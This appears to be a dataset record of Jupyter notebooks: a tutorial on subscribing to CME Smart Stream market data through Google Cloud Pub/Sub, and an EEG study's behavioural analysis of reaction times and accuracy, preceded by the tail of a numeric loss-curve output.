8.092021942138672\n172 7.664194107055664\n173 7.259500026702881\n174 6.875890254974365\n175 6.513085842132568\n176 6.169560432434082\n177 5.8443403244018555\n178 5.536559581756592\n179 5.24492073059082\n180 4.969001770019531\n181 4.707659721374512\n182 4.460142135620117\n183 4.225909233093262\n184 4.0037922859191895\n185 3.793743371963501\n186 3.5948028564453125\n187 3.406233787536621\n188 3.227598190307617\n189 3.0585086345672607\n190 2.898372173309326\n191 2.7465741634368896\n192 2.602959394454956\n193 2.4669559001922607\n194 2.3379757404327393\n195 2.215773344039917\n196 2.100053310394287\n197 1.9904696941375732\n198 1.8865892887115479\n199 1.7882546186447144\n200 1.695005178451538\n201 1.6066385507583618\n202 1.5228453874588013\n203 1.4434927701950073\n204 1.3684048652648926\n205 1.2971372604370117\n206 1.2296861410140991\n207 1.1657618284225464\n208 1.105137825012207\n209 1.0476728677749634\n210 0.9932741522789001\n211 0.941645085811615\n212 0.892839252948761\n213 0.846431314945221\n214 0.8025403618812561\n215 0.7609297037124634\n216 0.7215125560760498\n217 0.6840711236000061\n218 0.648654043674469\n219 0.6150773167610168\n220 0.5832456350326538\n221 0.55304354429245\n222 0.5245211124420166\n223 0.4973125159740448\n224 0.4715929329395294\n225 0.44722479581832886\n226 0.4240991473197937\n227 0.40219539403915405\n228 0.38142096996307373\n229 0.36171936988830566\n230 0.3430108428001404\n231 0.3253297209739685\n232 0.30852600932121277\n233 0.2926216721534729\n234 0.27752187848091125\n235 0.2632429301738739\n236 0.24966855347156525\n237 
0.2367924302816391\n238 0.22461438179016113\n239 0.21302594244480133\n240 0.20204897224903107\n241 0.19163306057453156\n242 0.18175019323825836\n243 0.172406867146492\n244 0.16356034576892853\n245 0.15515084564685822\n246 0.1471465826034546\n247 0.1396118700504303\n248 0.13244648277759552\n249 0.1256207376718521\n250 0.11918986588716507\n251 0.11302562803030014\n252 0.10725656896829605\n253 0.1017390638589859\n254 0.09650200605392456\n255 0.09155023097991943\n256 0.08687949180603027\n257 0.0824190080165863\n258 0.07820267975330353\n259 0.07418745756149292\n260 0.07036960124969482\n261 0.06678572297096252\n262 0.06335032731294632\n263 0.06009756773710251\n264 0.05702150613069534\n265 0.054098691791296005\n266 0.051327455788850784\n267 0.04871796816587448\n268 0.046210967004299164\n269 0.04384228587150574\n270 0.041607365012168884\n271 0.03949473053216934\n272 0.037473712116479874\n273 0.03556383401155472\n274 0.03375692293047905\n275 0.0320359542965889\n276 0.030400017276406288\n277 0.028846219182014465\n278 0.027368761599063873\n279 0.02596612647175789\n280 0.02464558742940426\n281 0.023396531119942665\n282 0.02220619097352028\n283 0.021082840859889984\n284 0.020008249208331108\n285 0.019000621512532234\n286 0.018032224848866463\n287 0.017121292650699615\n288 0.01625545509159565\n289 0.015439102426171303\n290 0.014669670723378658\n291 0.013926206156611443\n292 0.013228174299001694\n293 0.012565471231937408\n294 0.011927930638194084\n295 0.011333256959915161\n296 0.010762959718704224\n297 0.01022363267838955\n298 0.009720949456095695\n299 0.009237916208803654\n300 0.008771172724664211\n301 0.008342628367245197\n302 0.007930171675980091\n303 0.007536838762462139\n304 0.007156833074986935\n305 0.006807477213442326\n306 0.006474659778177738\n307 0.0061616175808012486\n308 0.005859468597918749\n309 0.005571956746280193\n310 0.005303850397467613\n311 0.005046273581683636\n312 0.004799655172973871\n313 0.004568567965179682\n314 0.004350310657173395\n315 0.00414681201800704\n316 0.003948734141886234\n317 0.0037640647497028112\n318 0.003585121361538768\n319 0.003417747560888529\n320 0.0032601284328848124\n321 0.0031060499604791403\n322 0.0029574956279248\n323 0.0028222317341715097\n324 0.0026964107528328896\n325 0.0025758754927664995\n326 0.002460675546899438\n327 0.0023473091423511505\n328 0.0022438950836658478\n329 0.002144365105777979\n330 0.002051248447969556\n331 0.001959338551387191\n332 0.0018745583947747946\n333 0.001796040334738791\n334 0.0017189307836815715\n335 0.0016471147537231445\n336 0.0015768555458635092\n337 0.0015089459484443069\n338 0.0014475068310275674\n339 0.0013895906740799546\n340 0.001331732957623899\n341 0.001278553856536746\n342 0.0012277018977329135\n343 0.0011764800874516368\n344 0.0011307267704978585\n345 0.0010872433194890618\n346 0.0010442468337714672\n347 0.0010029466357082129\n348 0.0009660141658969223\n349 0.000928566325455904\n350 0.0008933362551033497\n351 0.0008606849005445838\n352 0.0008287448436021805\n353 0.0007973524043336511\n354 0.0007683560252189636\n355 0.0007408586097881198\n356 0.0007147397845983505\n357 0.0006891388329677284\n358 0.0006650270079262555\n359 0.000641675665974617\n360 0.0006192573928274214\n361 0.000596818164922297\n362 0.0005777495680376887\n363 0.0005584603641182184\n364 0.0005398028297349811\n365 0.00052195432363078\n366 0.0005045364378020167\n367 0.00048882479313761\n368 0.0004734347457997501\n369 0.0004580653621815145\n370 0.0004429766268003732\n371 0.00042865893919952214\n372 0.0004152814217377454\n373 0.00040220972732640803\n374 
0.00039035061490722\n375 0.0003786215092986822\n376 0.00036682700738310814\n377 0.00035631877835839987\n378 0.0003456560370977968\n379 0.00033554129186086357\n380 0.00032579494290985167\n381 0.0003155771119054407\n382 0.0003062051546294242\n" ] ] ]
[ "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code" ] ]
cb1f1cd76ebcaea7d9bf98d89b6b0d1ddd98b90e
18,719
ipynb
Jupyter Notebook
Tutorials/GooglePubSubGetCMEBinaryData.ipynb
CMEGroup/CMESmartStream-on-GCP-Tutorial
ab7019ce7405956a96d9cb427a8a40193829ca56
[ "BSD-3-Clause" ]
6
2021-01-21T20:25:58.000Z
2021-12-27T09:25:10.000Z
Tutorials/GooglePubSubGetCMEBinaryData.ipynb
algo88/CMESmartStream-on-GCP-Tutorial
ab7019ce7405956a96d9cb427a8a40193829ca56
[ "BSD-3-Clause" ]
1
2020-09-14T16:16:32.000Z
2020-09-14T16:16:32.000Z
Tutorials/GooglePubSubGetCMEBinaryData.ipynb
algo88/CMESmartStream-on-GCP-Tutorial
ab7019ce7405956a96d9cb427a8a40193829ca56
[ "BSD-3-Clause" ]
2
2021-02-27T01:40:10.000Z
2021-04-04T12:20:23.000Z
40.871179
499
0.643945
[ [ [ "# CME Smart Stream on Google Cloud Platform Tutorials\n## Getting CME Binary Data from CME Smart Stream on Google Cloud Platform (GCP)\n\nThis workbook demonstrates the ability to quickly use the CME Smart Stream on GCP solution. Through the examples, we will \n- Authenticate using GCP IAM information\n- Configure which CME Smart Stream on GCP Topic containing the Market Data \n- Download a single message from your Cloud Pub/Sub Subscription\n- Delete your Cloud Pub/Sub Subscription\n\nThe following example references the following webpage to pull the information:\n\nhttps://www.cmegroup.com/confluence/display/EPICSANDBOX/CME+Smart+Stream+GCP+Topic+Names\n\n\nAuthor: Aaron Walters (Github: @aaronwalters79). \nOS: MacOS", "_____no_output_____" ] ], [ [ "#import packages. These are outlined in the environment.ymal file as part of this project.\n#these can also be directly imported. \n\n# Google SDK: https://cloud.google.com/sdk/docs/quickstarts\n# Google PubSub: https://cloud.google.com/pubsub/docs/reference/libraries\n\nfrom google.cloud import pubsub_v1\nimport os\nimport google.auth\n\n", "_____no_output_____" ] ], [ [ "# Authentication using Google IAM\n\nCME Smart Stream uses Google Cloud native Idenity and Accesss Management (IAM) solutions. Using this approach, customers are able to natively access CME Smart Stream solution without custom SDK's or authentication routines. All the code in this workboard is native Google Python SDK. While the Google Pub/Sub examples below are using python, there are native SDK's for other popular languages including Java, C#, Node.js, PHP, and others.\n\nTo download those libraries, please see the following location: https://cloud.google.com/pubsub/docs/reference/libraries\n\n\nWhen onboarding to CME Smart Stream, you will supply at least one Google IAM Member accounts. https://cloud.google.com/iam/docs/overview. When accessing CME Smart Stream Topics, you will use the same IAM account infromation to create your Subscription using navative GCP authenticaion routines within the GCP SDK. \n\nThe following authentication routines below use either a Service Account or User Account. Google highly recomends using an Service Account with associated authorization json. This document also contains authentication via User Account in the event you requested CME to use User Account for access. You only need to use one of these for the example.\n\n", "_____no_output_____" ], [ "## Authentication Routine for Service Account \nThis section is for customers using Service Accounts. You should update the './gcp-auth.json' to reference your local authorization json file downloaded from google. \n\nFurther documentation is located here: https://cloud.google.com/docs/authentication/getting-started ", "_____no_output_____" ] ], [ [ "## Authentication Method Options -- SERVICE ACCOUNT JSON FILE\n# This should point to the file location of the json file downloaded from GCP console. This will load it into your os variables and be automtically leverage when your system interacts with GCP.\n\n#os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = \"./gcp-auth.json\" #Uncomment if using this method.\n\n", "_____no_output_____" ] ], [ [ "## Authentication for User Account\n\nThis section is for customers that registered thier GCP User Account (i.e. [email protected]). This routine will launch the OS SDK to authenticate you as that user and then set it as your default credentials for the rest of the workflow when interacting with GCP. 
\n\nIN OS TERMINAL: 'gcloud auth application-default login' without quotes.", "_____no_output_____" ] ], [ [ "## Authentication Method User Machine Defaults\n#\n#Run \"gcloud auth login\" in command line and login as the user. The code below will do that automatically. \n#It should laucnh a browser to authenticate into GCP that user name and associated permissions will be used in the remaining of the code below\n\n# This code will put out a warning about using end user credentials.\n# Reference: https://google-auth.readthedocs.io/en/latest/user-guide.html\n\n\ncredentials, project = google.auth.default()", "/anaconda3/envs/python3/lib/python3.7/site-packages/google/auth/_default.py:66: UserWarning: Your application has authenticated using end user credentials from Google Cloud SDK. We recommend that most server applications use service accounts instead. If your application continues to use end user credentials from Cloud SDK, you might receive a \"quota exceeded\" or \"API not enabled\" error. For more information about service accounts, see https://cloud.google.com/docs/authentication/\n warnings.warn(_CLOUD_SDK_CREDENTIALS_WARNING)\n" ] ], [ [ "# Set Your Smart Stream on GCP Projects and Topics\n", "_____no_output_____" ], [ "\n## Set CME Smart Stream Project \n\nCME Smart Stream on GCP data is avaliable in two GCP Projects based upon Production and Non-Production (i.e. certification and new release) data. Customers are granted access to projects through the onboarding process. \n\nThe example below sets the target CME Smart Stream on GCP Project as an OS variable for easy reference.\n", "_____no_output_____" ] ], [ [ "#This is the project at CME \nos.environ['GOOGLE_CLOUD_PROJECT_CME'] = \"cmegroup-marketdata-newrel\" #CERT and NEW RELEASE\n#os.environ['GOOGLE_CLOUD_PROJECT_CME'] = \"cmegroup-marketdata\" #PRODUCTION", "_____no_output_____" ] ], [ [ "## Set CME Smart Stream Topics\n\nCME Smart Stream on GCP follows the traditional data segmentation of the CME Multicast solution. \n\nEach channel on Multicast is avaliable as a Topic in Google Cloud PubSub. This workbook will create 1 subscription in the customer's account against 1 Topic from the CME project. Clearly, customers can script this to create as many subscriptions as needed. \n\nPlease see: https://www.cmegroup.com/confluence/display/EPICSANDBOX/CME+Smart+Stream+GCP+Topic+Names for all the topic names. \n\nYou can also review the notebook included in this git project named Google PubSub Get CME Topics on how to read the names from the website into a local CSV file or use in automated scripts.", "_____no_output_____" ] ], [ [ "# The CME TOPIC that a Subscription will be created against\nos.environ['GOOGLE_CLOUD_TOPIC_CME'] = \"CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\" #CERT\n#s.environ['GOOGLE_CLOUD_TOPIC_CME'] = \"NR.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\" #NEW RELEASE\n#os.environ['GOOGLE_CLOUD_TOPIC_CME'] = \"CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\" #PRODUCTION \n\n", "_____no_output_____" ] ], [ [ "# Set Customer Configurations", "_____no_output_____" ], [ "## Set Customer Project & Subscription Name\n\nSmart Stream on GCP solution requires that the customer create a Cloud Pub/Sub Subscription in thier account. This subscription will automatically collect data from the CME Smart Stream Pub/Sub Topic. Since the Subscriptin is in the customer account we must specify the customer GCP Project and the name of the Subscription they want in the project. 
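In other words, the code below ends up referencing two fully qualified Cloud Pub/Sub resource names, one on each side (the placeholder values here are purely illustrative):\n\n```\nprojects/<your-gcp-project>/subscriptions/<your-subscription-name>\nprojects/<cme-gcp-project>/topics/<cme-topic-name>\n```\n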
\n\nIn the example below, we set the project directly based upon our GCP project name. We also create a subscription name by prepending 'MY_' to the name of the Topic we are joining. \n", "_____no_output_____" ] ], [ [ "#Your Configurations for the project you want to have access; \n#will use the defaults from credentials \nos.environ['GOOGLE_CLOUD_PROJECT'] = \"prefab-rampart-794\"\n\n#My Subscipription Name -- Take the CME Topic Name and prepend 'MY_' -- Can be any thing the customer wants\nos.environ['MY_SUBSCRIPTION_NAME'] = 'MY_'+os.environ['GOOGLE_CLOUD_TOPIC_CME'] #MY SUBSCRIPTION NAME", "_____no_output_____" ] ], [ [ "# Final Configuration\n\nThe following is the final configuration for your setup.", "_____no_output_____" ] ], [ [ "\nprint ('Target Project: \\t',os.environ['GOOGLE_CLOUD_PROJECT_CME'] )\nprint ('Target Topic: \\t\\t', os.environ['GOOGLE_CLOUD_TOPIC_CME'] , '\\n' )\nprint ('My Project: \\t\\t',os.environ['GOOGLE_CLOUD_PROJECT'])\nprint ('My Subscriptions: \\t',os.environ['MY_SUBSCRIPTION_NAME'] )", "Target Project: \t cmegroup-marketdata-newrel\nTarget Topic: \t\t CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310 \n\nMy Project: \t\t prefab-rampart-794\nMy Subscriptions: \t MY_CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\n" ] ], [ [ "# Create Your Subscription to CME Smart Stream Data Topics\nWe have all the main variables set and can pass them to the Cloud Pub/Sub Python SDK. The following attempts to create a Subscription (MY_SUBSCRIPTION_NAME) in your specified project (GOOGLE_CLOUD_PROJECT) that points to the CME Topic (GOOGLE_CLOUD_TOPIC_CME) and Project (GOOGLE_CLOUD_PROJECT_CME) of that Topic.\n\nOnce created or determined it already exists we will join our python session to the Subscription as 'subscriber'. \n\nFull documentation on this Pub/Sub example is avaliable: https://googleapis.github.io/google-cloud-python/latest/pubsub/#subscribing\n", "_____no_output_____" ] ], [ [ "#https://googleapis.github.io/google-cloud-python/latest/pubsub/#subscribing\n\n\n#Create Topic Name from Config Above\ntopic_name = 'projects/{cme_project_id}/topics/{cme_topic}'.format( cme_project_id=os.getenv('GOOGLE_CLOUD_PROJECT_CME'), cme_topic=os.getenv('GOOGLE_CLOUD_TOPIC_CME'), )\n\n#Create Subscription Name from Config Above\nsubscription_name = 'projects/{my_project_id}/subscriptions/{my_sub}'.format(my_project_id=os.getenv('GOOGLE_CLOUD_PROJECT'),my_sub=os.environ['MY_SUBSCRIPTION_NAME'], )\n\n#Try To Create a subscription in your Project\nsubscriber = pubsub_v1.SubscriberClient(credentials=credentials)\ntry:\n subscriber.create_subscription(\n name=subscription_name, \n topic=topic_name,\n ack_deadline_seconds=60, #This limits the likelihood google will redeliver a recieved message, default is 10s.\n )\n print ('Created Subscriptions in Project \\n')\n\n\n print ('Listing Subscriptions in Your Project %s : ' % os.getenv('GOOGLE_CLOUD_PROJECT'))\n for subscription in subscriber.list_subscriptions(subscriber.project_path(os.environ['GOOGLE_CLOUD_PROJECT'])):\n print('\\t', subscription.name)\n\n\n\nexcept:\n e = sys.exc_info()[1]\n print( \"Error: %s \\n\" % e )\n", "Created Subscriptions in Project \n\nListing Subscriptions in Your Project prefab-rampart-794 : \n\t projects/prefab-rampart-794/subscriptions/ALEXDEMO_CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\n" ] ], [ [ "## Subscription View in Google Cloud Console\n\nSubscriptions are also avaliable for viewing in Google Cloud Console (https://console.cloud.google.com/). 
Navigate to Cloud Pub/Sub and click Subscription. If you click your Subscription Name, it will open up the details about that Subscription. You can see the all queued messages and core settings which are set to default settings as we did not specify special settings and the functions above used the defaults. \n\nAnother thing shown in this view is the total queued messages from GCP in the Subscription.\n", "_____no_output_____" ], [ "## Pull a Single Message from CME \n\nThe following will do a simple message pull from your Subscription and print it out locally. There are extensive examples on data pulling from a Subscription including batch and async (https://cloud.google.com/pubsub/docs/pull). \n\n", "_____no_output_____" ] ], [ [ "#Pull 1 Message\nprint ('Pulling a Single Message and Displaying:')\n\nCME_DATA = subscriber.pull(subscription_name, max_messages=1)\n\n#Print that Message\nprint (CME_DATA)\n", "Pulling a Single Message and Displaying:\nreceived_messages {\n ack_id: \"TgQhIT4wPkVTRFAGFixdRkhRNxkIaFEOT14jPzUgKEURAQgUBXx9cUFPdVVeGgdRDRlyfGcjbAkXUgRGVnlVWRENem1cVzhYDxl7e2F2bl4VAwpHUn13wszCqPLBIR1tNY2h8KFASony3-N2Zho9XxJLLD5-PT1FQV5AEkw2CERJUytDCypYEQ\"\n message {\n data: \":|\\027\\000\\353\\336\\260\\266\\260n\\346\\025@\\000\\013\\000/\\000\\001\\000\\t\\000\\257\\266\\220\\266\\260n\\346\\025\\204\\000\\000(\\000\\001\\331\\376\\304\\022\\017\\000\\000\\000\\211E\\303$\\000\\000\\000\\000\\000j\\317\\245>\\'\\001\\000\\003\\000\\000\\000K)\\000\\000\\0001\\000\\000\\000\\000\\000\\000\"\n attributes {\n key: \"Channel\"\n value: \"310\"\n }\n attributes {\n key: \"MsgSeqNum\"\n value: \"1539130\"\n }\n attributes {\n key: \"SendingTime\"\n value: \"1578070424712\"\n }\n message_id: \"920960344628213\"\n publish_time {\n seconds: 1578070424\n nanos: 736000000\n }\n }\n}\n\n" ] ], [ [ "# Delete Subscriptions\n\nYou can also use the Python SDK to delete your Cloud Pub/Sub Subscriptions. The following will attempt to delete ALL the subscriptions in your Project. \n", "_____no_output_____" ] ], [ [ "#List Subscriptions in My Project / Delete Subscription\ndelete = True\n\nsubscriber = pubsub_v1.SubscriberClient()\nproject_path = subscriber.project_path(os.environ['GOOGLE_CLOUD_PROJECT'])\n\nif not delete: \n\n print ('Did you mean to Delete all Subscriptions? If yes, then set delete = True')\n\nfor subscription in subscriber.list_subscriptions(project_path): \n #Delete Subscriptions\n if delete: \n subscriber.delete_subscription(subscription.name)\n print (\"\\tDeleted: {}\".format(subscription.name))\n else:\n print(\"\\tActive Subscription: {}\".format(subscription.name))", "/anaconda3/envs/python3/lib/python3.7/site-packages/google/auth/_default.py:66: UserWarning: Your application has authenticated using end user credentials from Google Cloud SDK. We recommend that most server applications use service accounts instead. If your application continues to use end user credentials from Cloud SDK, you might receive a \"quota exceeded\" or \"API not enabled\" error. For more information about service accounts, see https://cloud.google.com/docs/authentication/\n warnings.warn(_CLOUD_SDK_CREDENTIALS_WARNING)\n" ] ], [ [ "# Summary\n\nThis notebook went through the bare minimum needed to create a Cloud Pub/Sub Subscription against the CME Smart Stream on GCP solutions. 
\n\n\n\n\n# Questions?\n\nIf you have questions or think we can update this to additional use cases, please use the Issues feature in GitHub or reach out to the CME Sales team at [email protected]\n\n\n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1f26e93ea73015ce32714e647c951246b74773
289,455
ipynb
Jupyter Notebook
.ipynb_checkpoints/BHV01_ratings_prelim_analysis-checkpoint.ipynb
hoycw/PRJ_Error_eeg
6f6b01881dc6072a6616345382b0f0110ba75b11
[ "MIT" ]
1
2021-01-30T22:11:34.000Z
2021-01-30T22:11:34.000Z
.ipynb_checkpoints/BHV01_ratings_prelim_analysis-checkpoint.ipynb
hoycw/PRJ_Error_eeg
6f6b01881dc6072a6616345382b0f0110ba75b11
[ "MIT" ]
null
null
null
.ipynb_checkpoints/BHV01_ratings_prelim_analysis-checkpoint.ipynb
hoycw/PRJ_Error_eeg
6f6b01881dc6072a6616345382b0f0110ba75b11
[ "MIT" ]
1
2020-12-26T20:49:51.000Z
2020-12-26T20:49:51.000Z
388.530201
42,718
0.923619
[ [ [ "from __future__ import division\n%matplotlib inline\nimport sys \nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport scipy.io as io\nimport pickle\n\nimport scipy.stats", ":0: FutureWarning: IPython widgets are experimental and may change in the future.\n" ], [ "SBJ = 'colin_test2'", "_____no_output_____" ], [ "prj_dir = '/Volumes/hoycw_clust/PRJ_Error_eeg/'#'/Users/sheilasteiner/Desktop/Knight_Lab/PRJ_Error_eeg/'\nresults_dir = prj_dir+'results/'\nfig_type = '.png'\ndata_dir = prj_dir+'data/'\nsbj_dir = data_dir+SBJ+'/'", "_____no_output_____" ] ], [ [ "### Load paradigm parameters", "_____no_output_____" ] ], [ [ "prdm_fname = os.path.join(sbj_dir,'03_events',SBJ+'_prdm_vars.pkl')\nwith open(prdm_fname, 'rb') as f:\n prdm = pickle.load(f)", "_____no_output_____" ] ], [ [ "### Load Log Info", "_____no_output_____" ] ], [ [ "behav_fname = os.path.join(sbj_dir,'03_events',SBJ+'_behav.csv')\ndata = pd.read_csv(behav_fname)", "_____no_output_____" ], [ "# Remove second set of training trials in restarted runs (EEG12, EEG24, EEG25)\nif len(data[(data['Trial']==0) & (data['Block']==-1)])>1:\n train_start_ix = data[(data['Trial']==0) & (data['Block']==-1)].index\n train_ix = [ix for ix in data.index if data.loc[ix,'Block']==-1]\n later_ix = [ix for ix in data.index if ix >= train_start_ix[1]]\n data = data.drop(set(later_ix).intersection(train_ix))\n data = data.reset_index()", "_____no_output_____" ], [ "# Change block numbers on EEG12 to not overlap\nif SBJ=='EEG12':\n b4_start_ix = data[(data['Trial']==0) & (data['Block']==4)].index\n for ix in range(b4_start_ix[1]):\n if data.loc[ix,'Block']!=-1:\n data.loc[ix,'Block'] = data.loc[ix,'Block']-4", "_____no_output_____" ], [ "# Label post-correct (PC), post-error (PE) trials\ndata['PE'] = [False for _ in range(len(data))]\nfor ix in range(len(data)):\n # Exclude training data and first trial of the block\n if (data.loc[ix,'Block']!=-1) and (data.loc[ix,'Trial']!=0):\n if data.loc[ix-1,'Hit']==0:\n data.loc[ix,'PE'] = True", "_____no_output_____" ], [ "# pd.set_option('max_rows', 75)\n# data[data['Block']==3]", "_____no_output_____" ] ], [ [ "# Add specific analysis computations", "_____no_output_____" ] ], [ [ "# Find middle of blocks to plot accuracy\nblock_start_ix = data[data['Trial']==0].index\nif SBJ=='EP11':#deal with missing BT_T0\n block_mid_ix = [ix+prdm['n_trials']/2 for ix in block_start_ix]\nelse:\n block_mid_ix = [ix+prdm['n_trials']/2 for ix in block_start_ix[1:]]\n\n# Add in full_vis + E/H training: 0:4 + 5:19 = 10; 20:34 = 27.5 \nblock_mid_ix.insert(0,np.mean([prdm['n_examples']+prdm['n_training'],\n prdm['n_examples']+2*prdm['n_training']])) #examples\nblock_mid_ix.insert(0,np.mean([0, prdm['n_examples']+prdm['n_training']]))\n#easy training (would be 12.5 if splitting examples/train)", "_____no_output_____" ], [ "# Compute accuracy per block\naccuracy = data['Hit'].groupby([data['Block'],data['Condition']]).mean()\nacc_ITI = data['Hit'].groupby([data['ITI type'],data['Condition']]).mean()\nfor ix in range(len(data)):\n data.loc[ix,'Accuracy'] = accuracy[data.loc[ix,'Block'],data.loc[ix,'Condition']]\n data.loc[ix,'Acc_ITI'] = acc_ITI[data.loc[ix,'ITI type'],data.loc[ix,'Condition']]", "_____no_output_____" ], [ "# Break down by post-long and post-short trials\ndata['postlong'] = [False if ix==0 else True if data['RT'].iloc[ix-1]>1 else False for ix in range(len(data))]\n\n# Compute change in RT\ndata['dRT'] = [0 for ix in range(len(data))]\nfor ix in 
range(len(data)-1):\n data.loc[ix+1,'dRT'] = data.loc[ix+1,'RT']-data.loc[ix,'RT']", "_____no_output_____" ], [ "# Grab rating data to plot\nrating_trial_idx = [True if rating != -1 else False for rating in data['Rating']]\nrating_data = data['Rating'][rating_trial_idx]", "_____no_output_____" ] ], [ [ "# Plot Full Behavior Across Dataset", "_____no_output_____" ] ], [ [ "# Accuracy, Ratings, and Tolerance\nf, ax1 = plt.subplots()\nx = range(len(data))\nplot_title = '{0} Tolerance and Accuracy: easy={1:0.3f}; hard={2:0.3f}'.format(\n SBJ, data[data['Condition']=='easy']['Hit'].mean(),\n data[data['Condition']=='hard']['Hit'].mean())\n \ncolors = {'easy': [0.5, 0.5, 0.5],#[c/255 for c in [77,175,74]],\n 'hard': [1, 1, 1],#[c/255 for c in [228,26,28]],\n 'accuracy': 'k'}#[c/255 for c in [55,126,184]]}\nscat_colors = {'easy': [1,1,1],#[c/255 for c in [77,175,74]],\n 'hard': [0,0,0]}\naccuracy_colors = [scat_colors[accuracy.index[ix][1]] for ix in range(len(accuracy))]\n#scale = {'Hit Total': np.max(data['Tolerance'])/np.max(data['Hit Total']),\n# 'Score Total': np.max(data['Tolerance'])/np.max(data['Score Total'])}\n\n# Plot Tolerance Over Time\nax1.plot(data['Tolerance'],'b',label='Tolerance')\nax1.plot(x,[prdm['tol_lim'][0] for _ in x],'b--')\nax1.plot(x,[prdm['tol_lim'][1] for _ in x],'b--')\nax1.set_ylabel('Target Tolerance (s)', color='b')\nax1.tick_params('y', colors='b')\nax1.set_xlim([0,len(data)])\nax1.set_ylim([0, 0.41])\nax1.set_facecolor('white')\nax1.grid(False)\n\n# Plot Accuracy per Block\nax2 = ax1.twinx()\n# ax2.plot(data['Hit Total']/np.max(data['Hit Total']),'k',label='Hit Total')\nax2.fill_between(x, 1, 0, where=data['Condition']=='easy',\n facecolor=colors['easy'], alpha=0.3)#, label='hard')\nax2.fill_between(x, 1, 0, where=data['Condition']=='hard',\n facecolor=colors['hard'], alpha=0.3)#, label='easy')\nax2.scatter(block_mid_ix, accuracy, s=50, c=accuracy_colors,\n edgecolors='k', linewidths=1)#colors['accuracy'])#,linewidths=2)\nax2.scatter(rating_data.index.values, rating_data.values/100, s=25, c=[1, 0, 0])\nax2.set_ylabel('Accuracy', color=colors['accuracy'])\nax2.tick_params('y', colors=colors['accuracy'])\nax2.set_xlabel('Trials')\nax2.set_xlim([0,len(data)])\nax2.set_ylim([0, 1])\nax2.set_facecolor('white')\nax2.grid(False)\n\nplt.title(plot_title)\n\nplt.savefig(results_dir+'BHV/ratings_tolerance/'+SBJ+'_tolerance'+fig_type)", "_____no_output_____" ] ], [ [ "# Plot only real data (exclude examples + training)", "_____no_output_____" ] ], [ [ "data_all = data\n# Exclude: Training/Examples, non-responses, first trial of each block\nif data[data['RT']<0].shape[0]>0:\n print 'WARNING: '+str(data[data['RT']<0].shape[0])+' trials with no response!'\ndata = data[(data['Block']!=-1) & (data['RT']>0) & (data['ITI']>0)]", "_____no_output_____" ] ], [ [ "## Histogram of ITIs", "_____no_output_____" ] ], [ [ "# ITI Histogram\nf,axes = plt.subplots(1,2)\nbins = np.arange(0,1.1,0.01)\nhist_real = sns.distplot(data['ITI'],bins=bins,kde=False,label=SBJ,ax=axes[0])\nhist_adj = sns.distplot(data['ITI type'],bins=bins,kde=False,label=SBJ,ax=axes[1])\naxes[0].set_xlim([0, 1.1])\naxes[1].set_xlim([0, 1.1])\nplt.subplots_adjust(top=0.93)\nf.suptitle(SBJ)\nplt.savefig(results_dir+'BHV/ITIs/'+SBJ+'_ITI_hist'+fig_type)", "_____no_output_____" ] ], [ [ "## Histogram of all RTs", "_____no_output_____" ] ], [ [ "# RT Histogram\nf,ax = plt.subplots()\nhist = sns.distplot(data['RT'],label=SBJ)\nplt.subplots_adjust(top=0.9)\nhist.legend() # can also get the figure from 
plt.gcf()\nplt.savefig(results_dir+'BHV/RTs/histograms/'+SBJ+'_RT_hist'+fig_type)", "_____no_output_____" ] ], [ [ "## RT Histograms by ITI", "_____no_output_____" ] ], [ [ "# ANOVA for RT differences across ITI\nitis = np.unique(data['ITI type'])\nif len(prdm['ITIs'])==4:\n f,iti_p = scipy.stats.f_oneway(data.loc[data['ITI type']==itis[0],('RT')].values,\n data.loc[data['ITI type']==itis[1],('RT')].values,\n data.loc[data['ITI type']==itis[2],('RT')].values,\n data.loc[data['ITI type']==itis[3],('RT')].values)\nelif len(prdm['ITIs'])==3:\n f,iti_p = scipy.stats.f_oneway(data.loc[data['ITI type']==itis[0],('RT')].values,\n data.loc[data['ITI type']==itis[1],('RT')].values,\n data.loc[data['ITI type']==itis[2],('RT')].values)\nelif len(prdm['ITIs'])==2:\n f,iti_p = scipy.stats.ttest_ind(data.loc[data['ITI type']==itis[0],('RT')].values,\n data.loc[data['ITI type']==itis[1],('RT')].values)\nelse:\n print 'WARNING: some weird paradigm version without 2, 3, or 4 ITIs!'\n# print f, p", "7.50997664622 7.38855835564e-05\n" ], [ "f, axes = plt.subplots(1,2)\n\n# RT Histogram\nrt_bins = np.arange(0.7,1.3,0.01)\nfor iti in itis:\n sns.distplot(data['RT'].loc[data['ITI type'] == iti],bins=rt_bins,label=str(round(iti,2)),ax=axes[0])\naxes[0].legend() # can also get the figure from plt.gcf()\naxes[0].set_xlim(min(rt_bins),max(rt_bins))\n\n# Factor Plot\nsns.boxplot(data=data,x='ITI type',y='RT',hue='ITI type',ax=axes[1])\n\n# Add overall title\nplt.subplots_adjust(top=0.9,wspace=0.3)\nf.suptitle(SBJ+' RT by ITI (p='+str(round(iti_p,4))+')') # can also get the figure from plt.gcf()\n\n# Save plot\nplt.savefig(results_dir+'BHV/RTs/hist_ITI/'+SBJ+'_RT_ITI_hist_box'+fig_type)", "_____no_output_____" ] ], [ [ "## RT adjustment after being short vs. long", "_____no_output_____" ] ], [ [ "# t test for RT differences across ITI\nitis = np.unique(data['ITI type'])\nf,postlong_p = scipy.stats.ttest_ind(data.loc[data['postlong']==True,('dRT')].values,\n data.loc[data['postlong']==False,('dRT')].values)", 